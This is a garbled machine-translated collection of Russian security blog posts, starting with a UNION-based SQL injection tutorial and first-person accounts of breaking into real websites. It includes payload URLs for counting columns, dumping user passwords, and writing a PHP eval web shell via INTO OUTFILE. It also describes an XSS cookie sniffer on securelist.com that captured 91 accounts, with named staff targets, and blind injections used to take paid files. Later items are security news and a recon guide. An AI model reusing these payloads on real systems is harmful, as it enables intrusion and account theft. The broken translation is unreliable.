Learn parameter UNION. In SQL keyword UNION is used to combine the results of two SQL-queries into a single table. That is, in order to get something we need from the other table.



Benefit from the


If the "Numeric", the query does not need to send us a quote and naturally put a comment at the end. Let's go back to the script index1.php.

Referring to the script http: //sqlinj/index1.php? Id = 1 UNION SELECT 1. Query the database we get like this:
SELECT * FROM news WHERE id = 1 UNION SELECT 1
And he gave us an error, because to work with surfeiting query, we require the same number of fields.

Because we can not influence their number in the first query, we need to pick up their number in the second, that it is equal to the first one.

Select the number of fields


Selection fields is very simple, just send such requests:
http: //sqlinj/index1.php? id = 1 UNION SELECT 1,2
Error ...
http: //sqlinj/index1.php? id = 1 UNION SELECT 1,2,3
Again a mistake!
http: //sqlinj/index1.php? id = 1 UNION SELECT 1,2,3,4,5
No error! Hence the number of columns is equal to 5.

GROUP BY

Often it happens that the fields can be 20 or 40 or even 60. To us every time not to touch them, use the GROUP BY

If the request
http: //sqlinj/index1.php? id = 1 GROUP BY 2
did not give the error, then the number of fields is greater than 2. Try:

http: //sqlinj/index1.php? id = 1 GROUP BY 8
Op, we see an error, then number of fields less than 8.

If the GROUP BY 4 no error, and when GROUP BY 6 - error mean number of fields is equal to 5



Definition of output columns

To the first query we do not output enough to substitute a non-existent ID, for example:

http: //sqlinj/index1.php? id = -1 UNION SELECT 1,2,3,4,5

image
By this action, we determined which columns are displayed on this page. Now, to replace these figures to the right information, you can continue the request.

output


Suppose we know that there is still a users table in which there are fields id, name and pass.
We need to get information about the user with ID = 1

Therefore construct a query:

http: //sqlinj/index1.php? id = -1 UNION SELECT 1,2,3,4,5 FROM users WHERE id = 1
The script also continues to output
image

To do this, we substitute the name of the field, for a place of numbers 1 and 3

http: //sqlinj/index1.php? id = -1 UNION SELECT name, 2, pass, 4,5 FROM users WHERE id = 1
Got what - what was required!
image


For "string input parameter," as in the script index2.php need to add quote at the beginning and at the end of the comment character. example:
http: //sqlinj/index2.php? user = -1 'UNION SELECT name, 2, pass, 4,5 FROM users WHERE id = 1 - 20%


Read / Write File

To read and write files in the user database must be right FILE_PRIV.

recording Files

In fact, everything is very simple. To write the file, we will use the OUTFILE.
http: //sqlinj/index2.php? user = -1 'UNION SELECT 1,2,3,4,5 INTO OUTFILE' 1.php '-% 20
Ok, we have a file record. Thus, we can fill a mini-shell:
http: //sqlinj/index2.php? user = -1 'UNION SELECT 1,' <? php eval ($ _ GET [1])?> ', 3,4,5 INTO OUTFILE' 1.php '-% 20

reading files

Reading files made even easier than writing. Simply use the LOAD_FILE, for a place in that field, we choose:

http: //sqlinj/index2.php? user = -1 'UNION SELECT 1, LOAD_FILE (' 1.php '), 3,4,5 -% 20

Thus, we read the previous recorded file.


ways of protection


Protect even easier than using vulnerability. Just filter the data. If you pass the number, use
$ id = (int) $ _GET ['id'];

As suggested by malroc. Or advocate the use of PDO prepared statements.

Securelist.com - XSS vulnerabilities and SQL Injection

Hello everyone!
Securelist.com developed by Kaspersky Lab. The site has a blog in which employees are fasting LC, and ordinary users, once registered, can comment on them. We have comments or rating. Once the rating of all user comments becomes> = 100, the user receives the status of the blogger and can post to your blog. And once I have registered there ...


[Disclaimer]
All the actions described below are presented solely for oznakomeniya. Portal administration has been advised of all vulnerabilities found on the website. To remove some screenshots I took the site service peeep.us habrapolzovatelya snusmumrik. Special thanks to the team of the portal R3AL.RU for help and support.

[XSS]
By registering, I decided to do a standard test for XSS-vulnerability. I put the JS-script with alert'om and it worked, ie in the Username field was not filtering against XSS.
Without hesitation, I put a sniffer, commented on several blogs and waited. Sniffer hung on the site for about a month. During this time I was able to intercept 91 account to the site. Let's look at the work site more:
1) The user enters a username and password
2) The site writes cookie (VLUserkaspru) user parameters in the form:
id: 19DEShash
where id - the identifier of the user (can be found on the link: securelist.com/ru/userinfo/id)
19DEShash - standard php DES-hash with salt = 19
3) When you go to any page of your site, the script takes the user's cookie, and splits into 2 parts (by ":") is selected from the database password for the user where id = id, and compares the hash of the password from the database with the value of the hash cookie.
This means that, catching just one cookie, I can go to the website at any time (or I can sbrutit hash).
I decided to find out how the passwords are stored in the database. Check it was very simple - click the link "Forgot password" and we are on the E-Mail comes password in the clear. This means that passwords are stored in the database is open, not hashes.
Going into account, I found that I can change the E-Mail to reset your password. To confirm the change of E-Mail'a link only comes to the new E-Mail => I can change any account E-Mail, confirm it and return it to the password in the clear.
As I caught cookie employees LK, I could go to control panel blog. It looked like this:
image
View user profile with the status "Administrator" from the inside:
image
After a few tests, I found that the text of the blog is also not filtered => I can insert there any HTML / JS code (for example, an exploit).
Here is the edit page of the blog:
image
Field zaglovka posting is also not filtered, and the title is displayed on the main page => we can do a little deface:
imageimage
Well, or so:
imageimage
And especially for Habrahabr.
List of interesting id, cookie that I could intercept:
69 - Dmitry Bestuzhev expert "Kaspersky Lab"
72 - Sergey Golovanov, expert "Kaspersky Lab"
81 - Maria Namestnikova, expert "Kaspersky Lab"
82 - Jury governors, expert "Kaspersky Lab"
85 - Tatiana Nikitina, Blogger
1052 - dr, Administrator
7053 - Alexander Gostev, expert "Kaspersky Lab"

[SQL-Injection]
After a short time, and I would like to inform the site of the vulnerability, but decided to check the settings on the cookie filtering. And it turned out that id does not filter!
Substituting in the cookie various options, I learned that there is Blind SQL Injection:
12345) AND 1 = 2 -: hash
When this parameter is changed in my account is not allowed, but at
12345) AND 1 = 1 -: hash
I went as a logged user.
A couple of hours I spent on it to achieve normal Blind-O. The result was:
12345) AND 1 = 1 AND (SELECT ascii (substring (version (), 1,1)))> 100 -: hash
Those who know SQL can easily understand that here I compare ascii-code of the first character version of c 100. If it is greater than 100, then I get the user (AND TRUE AND TRUE), otherwise, I - Guest (AND TRUE AND FALSE) . By substituting different values, I know ascii-character code and translate it into a symbol.
On the server, PostgreSQL does not spinning the latest version.
Derive signs of INFORMATION_SCHEMA.TABLES:
12345) AND 1 = 1 AND (SELECT ascii (substring (table_name, 1,1)) from INFORMATION_SCHEMA.TABLES LIMIT 1 OFFSET 1)> 100 -: hash
So I started to write the names of the tables, but there was a bummer: I was able to bring only the name of the first table, and the vulnerability has stopped working (most likely, the administrator logs burned, but do not exclude the fact that someone whispered).

Most recently, on securelist.com a new record called «XSS for beginners." =)
XSS vulnerability did not fix it, even though I sent a letter in support and a message in the book of complaints and suggestions LC (answered that all necessary measures have been taken). Maybe this post will make the administration finally close the vulnerability.

UPD: Warning! This is not a PR site, company, or product product.
UPD2: On the topic:
Magic triptych or bad advice from KAV (the article appeared before my research, however, I learned about it quite recently).

45% of web resources of major Russian companies contain critical vulnerabilities

Web applications have become an integral part of the corporate information system of any modern organization, regardless of the type of its activities. Own web resources provide not only commercial companies but also government agencies that develop web services to provide online services.

Despite all the advantages of web applications, vulnerability they are one of the most common methods of getting into corporate information systems. This is confirmed by statistical studies, which are held annually experts Positive Technologies.

The research focused resources 67 largest Russian public organizations and industrial sectors of telecommunications and IT (banking systems in a separate paper).

Note: The study analyzed data collected during the work on assessing the level of security of web applications in 2012.

The most common vulnerabilities

Among the 10 most common vulnerabilities included two critical - "Implementation of operators SQL» and "directory traversal", which are subject to a 33% and 18% of the surveyed web resources, respectively.

In 2012, the most widespread information disclosure vulnerability Fingerprinting, allowing to identify the software and prepare the base for the attack: this fault prone three-quarters of surveyed resources (73%). In second place with 63% - cross-site scripting (Cross-site Scripting). Almost half of the systems (46%) there are errors that can automatically pick up credentials and passwords (Brute Force).

image

Vulnerability specific to various means of web application development

According to the study, 83% of web applications developed in the language of PHP, contain critical vulnerabilities, the remaining 17% of such systems contain vulnerabilities medium and low risk. In second place Perl: almost a third of the vulnerability of systems contain a high level of risk.

image

Vulnerability specific to different Web servers

In 2012, the most vulnerable to high-risk vulnerabilities were Web-based applications using a web server Apache: 88% of them contain critical security flaws. In second place Tomcat - 75% of high-risk errors. Third place with 43% sensitive resources took Nginx, and became the most secure web server IIS (14%).

Recall that the results of the previous studies were more vulnerable web servers Nginx and Apache.

image

Most web servers vulnerabilities associated with errors of administration, the most common of which is the Information Leakage.

Vulnerability by industry

The maximum concentration of Web applications that contain vulnerabilities high risk was identified in the telecommunications industry - 78%. In the industrial sector, exactly half (50%) resource contains critical security flaws, followed by a small margin the following sites IT- and information security companies (45%). With regard to government organizations, approximately one in three (27%) of a web application in this area contains a high level of vulnerability risk.

image

findings

In general, compared to 2011 average level web application security has become a little higher: in particular, the proportion of sites that contain critical vulnerabilities decreased by 15% to almost 45%. Positive Technologies experts have found only one infected Web application, whereas previously 10% of websites containing malicious code. On the other hand, there are signs of stagnation: did not change the proportion of web applications with high-risk vulnerabilities in the industrial sector and telecom sector sites increase the level of security is very slow.

Detective story about SQL injection, sometimes blind

Good day!

Would not have thought to write an article about it, because thought that the theme is pretty jaded. But, judging by this article, the audience interested. Finally convinced me that this one should write a comment.

This story happened to "friends of friends of my friend," but for the sake of brevity, I will write citations in his words, to use just the "I". It was a week ago. Let's go.

It took me learn a European language, in the light of a possible move to a European country. And I found a wonderful website, which was proposed to learn a language via podcast. Podcasts themselves are free, but you can buy a PDF recordings of lessons and exercises. I write this not really need, but my wife, unlike me, do not audial and language teaching it is also necessary. Before to buy something online, I've been studying the merchant's website - do not want my data somewhere flowed. And in this case, everything was more than bad. Desire to buy something immediately disappeared. But left without PDF unsportsmanlike. As a result, I decided to try to take advantage of one of the found vulnerabilities. I must say that I basically do not use any automated vulnerability scanner and essentially does no harm to users of the resource - they are not to blame, that the owner of the resource clumsily wrote it. Therefore, my tools are soobrazhalka and theoretical knowledge on the causes and the use of vulnerabilities.

beginning

The first thing I looked at a few examples of the demo available to download PDF. First, the user sent to:

/guide.php?id=lesson_id

At this point, checks if the current user is given the right to download the PDF. If so - is redirected to:

/download.php?f=filename.pdf

Immediately it turned out that the script gives the specified file does not check out. Because available for example lesson №1 had filename 001.pdf I decided to try to get all the files bust. If only it were that simple, then it would be to write about. But in this way managed to get only the first 100 files. The rest were in the name timestamp creation time and through them became impossible, since creation time differed for several months.

Rotate an SQL injection

Pretty soon discovered banal SQL injection in the GET parameter:

/some_script.php?id=123

It seems to be on its use is constructed very simply:
Determine the number of parameters in the query
Choose the table and field names (in the case of MySQL 5.0 and above - select them from information_schema)
Get the desired file names
Download files themselves

But problems began with the first point - to determine the number of fields in the query failed. With any number of fields in the UNION SELECT and any room in the ORDER BY n I get the message «You have error in your syntax ...»

In fact, I accidentally realized what exactly the problem - trying to make GROUP BY 1. To this I received an error «can not group by cnt». It turned out that the vulnerable parameter is used twice (well, at least that's the assumption I was unable to refute).

First select the number of records with the specified id:

SELECT count (*) FROM table where id = 123

If the number of records 0, it is considered that the page could not be found and there is a redirect to the home page. If the records are not 0, pulls information:

SELECT * FROM table where id = 123

Now it becomes clear why it was not possible to find out the number of fields in the query - their 2 and in one of them will always be the wrong number of fields in the UNION. Think of a way that would insert a different number of fields in the UNION in the first and second request, I could not. At this point, SQL injection has become blind. I could not find the table name with the file paths, but managed to find a table name with the user data (MySQL 4.1).

Dear developers, do not do 2 request, where you can make one! In this case, you could instead SELECT count (*) to check the number of records returned by the query SELECT *

Now it remains to find a way to get useful information. I did so:

/script.php?id=123 limit 0,0 union all select length (username)> 4 from tablename limit 0,1--

What we see here:
123 limit 0,0 - because count (*) will always return to us exactly one record, and we know that it has been returned to our part of the request, you need to remove it from the result
union all select length (username)> 4 from tablename limit 0,1-- - if the user name length is greater than 4, then the condition is true, MySQL will return the unit, and then an error when trying to execute the second query. If the condition is false - returns 0 and will redirect. Well, '-' for comment at the end of

Thus for HTTP headers can understand the true condition if we passed. We first determine the length of the user name, and then take out the binary search spelled the name itself (lower (substr (username, 1,1)) in ('a', 'b', 'c')). Then take out letter by letter password. But it turns out that the hashed password in md5. Although hashing without salt, but the passwords site administrators still could not pick up (in no rainbow tables and brute force on the netbook did not want to deal with, and besides, it's unsportsmanlike).

After some deliberation, it was decided to go another way. Because in the base turned out more than 60,000 users, I suggested that many of these popular passwords. And then just had to get user names alphabetically which is the password hash md5 ('password') - they turned out to be more than 100, and among them were people who bought the desired PDF. And they were kind enough to share them with me.

All this was done with a very simple script that sent HEAD-request (and why do we need the body of the page?) And watched the response header. If the 200 - the condition is true if the 302 - not true.

conclusion

Why all this written? To show that it is necessary to know the nature and causes of vulnerability rather than to learn how to use them. All uses of SQL injection, which I saw on the internet, asked to determine the number of fields through 5 or ORDER BY UNION SELECT 1,2,3 ... And the man who did not want to think I would go with a site with nothing.

In addition, I am a bit proud of my workaround instead of breaking hash. Well, not so long ago expressed skepticism about the existence of such vulnerabilities in today's Internet and on the practical application of blind SQL injection.

Friday, January 23, 2015

The judge admitted the use of encrypted mail service sign terrorism

Spanish judge Javier Gomez Bermudez admitted use of a group of Spanish activists encrypted mail service Riseup and that they have the book "Against Democracy» (Contra la democràcia) an indication that this group is engaged in terrorist activities. As a result, during the operation "Pandora" at the end of December 2014 more than 400 police officers raided 14 private homes and community centers in Spain, the results of which were arrested 11 people. Four of them were released, but seven imprisoned on charges of "terrorist activity unknown character." This led to many thousands protest march. The situation highlights edition NetworkWorld.

Significant is the fact that so-called "terrorists" did not kill anyone, did not explode and no one at all threatened. Everything that they were guilty before the law - it is the possession by some print media and the use of encrypted means for communication. There are unproven allegations of a possible link with a group of activists ATM bombings in 2012 and 2013, but the judge explained his decision by saying that it was not interested in communication with these groups explosions and investigate the activities of the group, based on the potential harm it may cause to future. In other words, there was a preventive justice.



In addition to the current economic crisis, Spain reeling the growing movement for secession of Catalonia (a referendum on the issue was canceled, but in the polls 80% of the population were in favor of the Autonomous Region Office), and the continuing problems on the part of Basque nationalists. Perhaps these problems forced security agencies to apply strict measures in such cases.

All this takes place against the background of the European Parliament based on the facts disclosed surveillance organized NSA, that "privacy - this is not a luxury but a basic right in a free and democratic society." Service Riseup, which provides users with encrypted mail (currently held registration for invite), in turn, published in his blog article titled "Safety - not a crime": "We reject such a Kafkaesque criminalization of social movements, as well as ridiculous and extremely disturbing conclusion that care about their own privacy can be equated with terrorism. "

How Tor Project is struggling with browser fingerprinting

The essence of the method is that on different systems in different browsers differently rendered text (and not just text), as it is responsible for a lot of different components at different levels, which can have different settings for the components of the lower layer.

May be trite different (with a different set of characters with slightly different glyphs and ligatures with different kerning ...) fonts.
Different parameters of the call library functions in different browsers.
Different versions libfreetype and other libraries rendering.
Different implementations in different OS and OS settings (for example, different versions of ClearType and different screen resolutions).
Different graphics drivers.
Other graphic iron.

This article describes a method using API getImageData, which returns the image pixel by pixel. Also considered the use of WebGL: on different systems and 3D-scenes are rendered in different ways.

The paper was recommended to use a soft-pure rendering, without the use of operating system components and other software installed on your PC, noise and other methods of protection. In Tor Project can create prints patched, asking permission to getImageData and replacing random fonts to fallback-font (which is why we have measurements of 10).

Defective by design

There are other API, current information. For example, API measurement text. If the text is rendered in different ways, means and size should be a little bit different. Test this hypothesis using API measureText for the same canvas and API getBoundingClientRect of DOM.

Skloniruyte gist, run on a computer at the last (or last) TBB, open it in the HTML-file from the repository, otpostite result in the comments. You can still go to the Fiddle Fiddle or in full screen. In principle, one could not make hash, it would give more room for the date-Meiningen, but even in compressed form a complete set of information about each font takes up very much space. Therefore dispense hashes. Who wants to dig deeper, he can uncomment some lines in the source.

Server hackers, DDoS-ivshih services Microsoft Xbox Live and Sony PlayStation Network, hacked

Curious case can be called hacking servers hacker group Lizard Squad. It is this group affect the proper operation of services Microsoft Xbox Live and Sony PlayStation Network, launching a powerful DDoS-attack. Now, as it turned out, would-be hackers themselves are the victim of other intruders.

The fact that this group has created its own service Lizard Stresser, allowing to carry out DDoS-attacks on the order book. Customer data is stored in clear (unencrypted) form on the servers of the service. As a result, third-party crackers "taken away" database with the data from the 14241 account.

In this case, many accounts were still money intended for Lizard Squad. Such "money" accounts were several hundred, and the funds were kept in Cryptocurrency Bitcoin. In US dollar terms in the accounts of "clients" were kept about 11 thousand US dollars.

It is worth recalling that the attack on the server Xbox Live and PlayStation Network was held December 25, 2014. Then the performance of services has been broken, and all the experts were able to recover only two days later. After hacking team members Lizard Squad reported that the purpose of the "action" - a demonstration of inefficient spending of company funds, plus a demonstration of insufficient quality service companies own services.

Not so long ago, the police arrested one of the team members Lizard Squad, now arrested several other people.

List of the most simple passwords: 2014

Once a year, the web is stable published lists of the most simple passwords that use network users. Most interestingly, from the simple and repetitive account login passwords used not only inexperienced users, but also quite a pro. Just too lazy to change the password for most of the more complex.

This year, his list of the most simple passwords published by SplashData. All data shown are used with the consent of the users of the service. On Geektimes, probably does not make sense to warn about the dangers of such passwords - are all already know. Let's just look at the list.

Perhaps it is not surprising that tops took the type of codes 123456 and 12345, together with the word password. By the way, these passwords are used often, even advanced users - simply because it is the password for services that are not critical for the person (well, for example, the account at any newspaper, or a forum, or some other similar resource).

Nevertheless, there are the only ones that use a combination of very light even to register for services, which contains information about the user's credit card. But there is probably no warnings will not help. So here it is, the full list:

1. 123456

2. password

3. 12345

4. 12345678

5. qwerty

6. 123456789

7. 1234

8. baseball

9. dragon

10. football

11. 1234567

12. monkey

13. letmein

14. abc123

15. 111111

16. mustang

17. access

18. shadow

19. master

20. michael

21. superman

22. 696969

23. 123123

24. batman

25. trustno1

Interestingly, the type of codes «batman» or «dragon» are relatively new to SplashData - before users like passwords are not created.

Large companies have agreed to protect the personal data of students

Google and Khan Academy joined the agreement Student Data Privacy Act (SDPA) between the giants of information and educational market, which provides for the protection of personal data of students from the spread of the Internet. Besides them signed the agreement yesterday put more than 15 companies. Last week, it still did about 75 different organizations, including giants such as Microsoft and Apple.

Companies that have signed the agreement will have to abide by a set of principles on the use of these students. The signatories promise not to sell the collected data and use them in targeted advertising. In addition, it will be easier and streamlined access to students' parents and students for their data, and the process of collection of such data should become more transparent.

Initiative Student Data Privacy Act proposed about a week ago, US President Barack Obama in a speech in Congress. The main idea of the speech - American life is highly dependent on the digital world, and issues such as hacker attacks (Obama mentioned the famous incident with Sony Pictures) can lead to serious consequences. The President insisted that the list of participants Student Data Privacy Act was open, then the parents of the young people will be able to know about who signed the agreement, and who - no.

About a week ago, Google refused to put his signature under the SDPA: in an interview with Business Insider officials search giant explained by the fact that the protection of personal data of users and so is a "top priority" for the company. What has changed since then, and why Google suddenly decided to change his point of view - is unknown.

5,000 gas stations in the United States threatened cyberattacks because of obsolete equipment

Security experts have discovered vulnerabilities in devices ATG, watching the level of fuel at gas stations the United States. Theoretically, hackers can gain control of the device to turn off the fuel supply or cause false signals, including leak: in this case, automatically turns off all pumps that paralyzes the station. According to the study, with the help of Internet attacks can gain control of such sensors to 5300 at a gas station in the United States. Communication protocols for equipment obsolete, and the owners of the stations are conventional routers and do not think about security.

image

Automated devices show the amount of fuel at the gas station to report when it's time to order gasoline. Attackers using Internet attacks can control the settings, making false reports or completely shutting off the supply of gasoline - saying that the tank is empty. If the device says that the tank is full, gas stations may simply be left without fuel - because no one will be ordered. In the worst case, an attacker can inform about the leak, which disables all pumps and paralyze the work station.

As the researchers note, at petrol stations are often used conventional routers bought from Best Buy, so that after you connect to the network stations owners face the same problems as ordinary consumer. The problem is that these devices monitor the level of fuel in the tanks. Most of the stations are not owned by large corporations and private owners, which are of little interest to the security of the network connection.

The most common sensors manufactured by Veeder-Root. These sensors can be protected with a password of six characters, which is unencrypted and can be intercepted, but mostly no password is used.

Among the main problems the researchers note obsolete communication protocols designed for the equipment for about twenty years ago.

Protect PHP scripts from copying

1. Issuance of licenses and license validation script

I am creating a key to the domain approximately as follows:
$ key = md5 ($ domain. $ secretword);

Scripts checks its license as follows:
$ key == md5 ($ domain. $ secretword);

Indeed, the ugly store $ secretword themselves in scripts. Therefore, one can use public-key encryption. When issuing a license, I'll sign it with your private key, and a script that license evaluation, the public key will be to check the validity of the license. But I did not find in the standard package of PHP functions are no public-key encryption, even RSA (I blind?). If you can help - I will be grateful.

So, the script checked the correctness of the license. That is, the suitability of the specified key to the specified domain. Go ahead.

2. Check domain

The script can check whether it is on the specified domain? We have no confidence in the $ _SERVER ['HTTP_HOST'].
Just on the conditions - no of connections to another server. This means that a connection to themselves on the proposed domain, and we check whether there are :)

To be more precise:
1) keep on servre random number (for example, in a temporary file) 2) please contact nash_domen.ru / nash_skript.php? Action = skazhi_chislo3) check what number we give to this address. If it corresponds to the fact that we have retained, so we're at:) 0) zero point return is necessary to add the stored number when we were called with the parameter action = skazhi_chislo
I'm a little simplified algorithm, in fact for each call to the script need to separately account for these random numbers.

Now the script knows that the license is valid, and that it is in the appropriate domain. The main problem is solved!

You tell me - wtf, each call script will pull itself? Indeed, brutally somehow. That Is Why:

3. Temporary License

The first time, if the test is successful, the script temporary files temporary license.
Temporary license is something nopodobie md5 (segodnyashnyaya_data, domain secret word).
Now with every request we check only a temporary license that is valid for the day. Once with a temporary license that something was wrong (changed, deleted, held a day) - the script will check everything again seriously and retain new temporary license.

4. Execution of the script on the local computer without a license


It would be ideal if the script does not require a license when running on the local computer. Why would a person to claim me with a license if he just wants to test the script on my computer? It should download it and use it. But when he put the script on the server, and then will come to me.

I do not know how to solve this problem. I have 3 options until the solution, but I do not like:
1) If the script is on a domain without points (type myscript /) - assume that this virtual domain, then it most likely site testing. The disadvantage of this method - the craftsmen will create a virtual domain on the server, and make a real domain synonymous. Just do not understand what to do with the domain localhost.

2) Check the $ _SERVER [«REMOTE_ADDR»]. Check the availability of '127' at the beginning of ip-addresses. Drawback - you can override this variable before running the script.

3) It's funny, but you can check the server's operating system. And allow execution under Windows. Just do not hurt me, it's just an option.

Planning for security analysis of web resources

Specific material, is not designed for a wide audience due to the low level of interest in covering the topic. The article can be useful specialists regularly review the security of web servers. Proposed methods should help ordering data on the structure and characteristics of the resource, to create something like a list of steps to perform the test.

Procedures and recordkeeping selected by the author on the basis of personal preference (and in many ways, inspired by the guidelines OWASP (2), etc.), any practitioner can (and most likely will want to) use your own set of techniques and methods of "logbook ". So, many of these online tools are not unique, someone can create their analogs or prefer ready.

A little bit about leadership OWASP Testing Guide: currently on the official website offers a version 3 (349 pages); whereas previously there had to download a OWASP_Testing_Guide_v3.full.pdf (374 pages). By cons leadership can be attributed to some redundancy, part of the described scenarios seem unlikely or extremely rare.

However, tips for organizing tests and risk classification system is definitely helpful. Other materials may be mentioned Common Criteria for Information Technology Security Evaluation and OSSTMM (Open Source Security Testing Methodology Manual).

For demonstration purposes, select the resources of a certain service center, spoiling technique customers instead of repair.


The procedure for analysis.

In my case, the data are entered in the table Excel, prepared on the basis of the template that includes a list of the information collected in the course of the safety analysis. Table is organized as follows: type of data assigned to the symbols that help shorthand - what action is possible to obtain specific information. There is space for a mark to hold each action, and to record the results of the field (including, and abbreviations). It looks like this:

______________________________________________
[RDNS] | Reverse DNS | x | Reverse DNS data
----------------------------------------------
One of the first steps is to identify the main resource identifiers (IP, hosting, web server). To do this, it seems to me the most convenient service combined Domain Dossier (3). It also helps in the identification of the server software add-on for Firefox - Server Spy (4).

simservice.ru = 213.189.197.165 (axx165.distributed.zenon.net)
samsungremont.ru = 89.111.176.12 (fe16.hc.ru)
Both sites are located on the shared-hosting "Zeno" and "Hosting Center", used by web server nginx and engine shop OSCommerce. We found simservice.ru version PHP / 5.2.17. Used widget feedback livetex.ru

Reverse DNS for said use online services Robtex (5) and BGP Looking Glass (6), thereby defining - whether it is a dedicated server or shared hosting. (In this case, to obtain data on other resources on the shared-hosting).

Then to visit the study resource using HTTP / HTTPS-sniffer implemented as add-on for Firefox - Foxmeter (7), which generally provides insight into the structure of the site, cross site scripting / widgets, etc. Get a list of available commands HTTP request OPTIONS (addon Poster (8), or curl). In this case, both the server did not answer the OPTIONS. You can also ask about the details of SSL-certificate, if any. Online tool, among others, is available on serversniff.net (10) In some cases, the search query of the form "victim.com" site: victim.com brings unexpected results: the files with incorrectly specified rights, service pages, etc. samsungremont.ru responded to an appeal to the .htaccess error 403 on behalf of the Apache / 1.3.42 (masking).

At this stage, it is already possible to get an idea about the server and CMS. Additional information can be found in the standard robots.txt file and sitemap.xml (sitemap.xml.gz). In case of shortage sitemap.xml can fill the gap with the help of online generator (9), and then the client application. Studied resources issued by robots.txt standard OSCommerce, sitemap.xml had to generate. In some cases it may be valuable information about the designer (companies or individuals) - many people use the typical solutions, such as some of the design studio emphatically refuse to recognize .htaccess, with the result that all products have the types of vulnerabilities - directory listing (OWASP-AZ-001) . In our case, the design is executed design bureau pella.ru, without any errors (given the ugly background image)

To get an idea of hosting, and last but not least on the used GIS are encouraged to investigate the official website of the host. Not to repeat this step once again, the data are recorded in a separate table for hosters (hardware, OS, address ranges, customer-specific domains). In this case, interest was information about the modem pool "Zeno": test access: demo: demo

745-7171 - Cisco Systems Access Server 5300
251-1030 - USRobotics MP16
After identifying CMS it is desirable to obtain a copy of the analysis. In most cases, even the big companies are using free engines like Wordpress / Drupal / Joomla !. Almost all paid engines can also be downloaded as a trial version that allows to study the structure and possible security problems. Common engines often suffer from errors, such as listing Wordpress or forced registration in Joomla !, allowing the use of a number of official functions.

In the study of the structure of the web resource paid special attention to the location of data and administrative interfaces. Available administrative input is risk classification OWASP-CM-007. In this case, the input is in the administrative / admin

Any error messages from the server can also carry useful information, such as physical file paths and service logins. In some cases it is necessary to look at the cookies: there may also disclose information about the server. In the studied sites - standard cookies OSCommerce and livetex. The presence of an internal search engine also adds information, and any shaper - potetsialny attack vector. Found the search engine.

Thursday, January 15, 2015

The vulnerability of computer systems and their classification

Vulnerability refers to any characteristic of the information system, the use of which the offender may result in the implementation of the threat. It does not matter purposefully used the vulnerability or that happens unintentionally. As an offender can be any entity corporate network that tried to implement unauthorized access to network resources by mistake, ignorance or with malicious intent.

To eliminate confusion with the name of vulnerabilities and attacks in 1999, MITRE Corporation () proposed a solution that is independent of the various search tools manufacturer vulnerabilities. This decision was implemented as a database CVE (Common Vulnerability Enumeration), which was later renamed the Common Vulnerabilities and Exposures. This allowed all professionals and manufacturers to talk the same language. For example, the different names of the same vulnerability (CA-96.06.cgi_example_code, HTTP 'phf' Attack, http-cgi-phf, phf CGI allows remote command execution, PHF Attacks - Fun and games for the whole family, # 107 - cgi-phf, # 3200 - WWW phf attack, Vulnerability in NCSA / Apache Example Code, http_escshellcmd, # 180 HTTP Server CGI example code compromises http server) received a single code CVE-1999-0067.

In the development of a database of experts in addition to CVE MITRE was attended by experts of many well-known companies and organizations. For example, ISS, Cisco, BindView, Axent, NFR, L-3, CyberSafe, CERT, Carnegie Mellon University, Institute of SANS, UC Davis Computer Security Lab, CERIAS etc. Their support base CVE said the company Internet Security Systems, Cisco, Axent, BindView, IBM and others. However, despite such an attractive initiative CVE database is not yet widespread among manufacturers of commercial products.

The most dangerous vulnerabilities design that can be detected and removed with great difficulty. In this case, the vulnerability inherent design or algorithm and therefore even perfect its implementation (which is impossible in principle) does not eliminate the vulnerability inherent in it.

For example, the vulnerability of the protocol stack TCP / IP. Underestimation of the safety requirements in creating this protocol stack has led to the fact that does not pass the month that there was no announcement of a new vulnerability in the protocols stack TCP / IP.

For example, 7 and 8 February 2000, there were a malfunction such popular and leading Internet-servers like Yahoo (), eBay (), Amazon (), Buy () and CNN (). February 9 similar fate befell the server ZDNet (), Datek () and E * Trade (). Conducted by the FBI investigation revealed that these servers are out of order because of the huge number of requests addressed to them, which led to the fact that the server could not handle the traffic of such scope and out of order. For example, organized by the server Buy traffic exceeded the average 24 times and 8 times higher than the maximum permissible load on the server supporting performance Buy. Once and for all eliminate these disadvantages is no longer possible - there are only temporary or partial measures.

However, there are exceptions. For example, the introduction of the draft set of corporate network modems to facilitate the work of staff, but greatly complicates the work of the security services. This leads to potential ways to bypass the firewall that protects internal resources from unauthorized use. And find and fix the vulnerability easily enough.

The meaning of the second category of vulnerabilities (vulnerabilities implementation) is an error in the implementation phase in the software or hardware correctly in terms of security of the project or algorithm. A striking example of this vulnerability - "buffer overflow" ("buffer overflow") in many implementations of programs, for example, sendmail or Internet Explorer. Detect and eliminate this type of vulnerability is relatively easy - by updating executable code or change the source code of the vulnerable software. Another example is the case of the implementation of vulnerabilities to computers Tandem, which occurred November 1, 1992 and January 7, 1993 At 3 am the functioning of most computers Tandem around the world has been violated because of a failure in the subsystem BASE23 Nucleus, leading to overflow variable timer microcode at a certain time. Because of this error, the value of the system clock has been reset to December 1983, which sometimes leads to misinterpretation of the data in a variety of financial applications.